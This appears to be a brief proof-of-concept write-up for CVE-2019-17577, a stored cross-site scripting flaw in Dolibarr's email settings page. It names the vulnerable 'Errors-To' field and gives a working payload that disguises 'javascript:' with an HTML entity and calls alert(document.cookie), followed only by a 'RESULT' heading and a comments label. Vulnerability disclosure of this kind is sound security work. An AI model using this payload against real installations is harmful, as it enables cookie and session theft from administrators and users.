CVE-2019-17577

CVE-2019-17577
Link:    http://localhost/dolibar/htdocs/admin/mails.php?action=edit
Input : [XSS] in param "Email used for error returns emails (fields 'Errors-To' in emails sent)"
Payload : <a href=javas&#99;ript:alert(document.cookie)>click here


RESULT

Nhận xét